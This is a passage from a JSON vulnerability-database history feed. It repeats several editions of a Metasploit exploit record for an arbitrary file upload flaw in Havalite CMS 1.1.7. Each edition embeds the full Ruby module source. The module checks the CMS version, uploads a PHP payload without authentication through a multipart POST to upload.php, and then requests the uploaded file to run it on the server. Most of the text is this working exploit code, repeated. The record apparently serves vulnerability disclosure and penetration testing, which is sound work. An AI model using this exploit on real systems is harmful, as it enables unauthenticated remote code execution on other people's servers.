"https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-07T14:59:01", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-07T17:09:11", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-07T17:09:11", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-13T15:12:44", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-13T15:12:44", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-13T19:15:04", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-13T19:15:04", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-14T01:15:04", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-14T01:15:04", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-14T03:15:33", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-14T03:15:33", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-15T19:13:30", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-15T19:13:30", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-15T21:21:24", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n 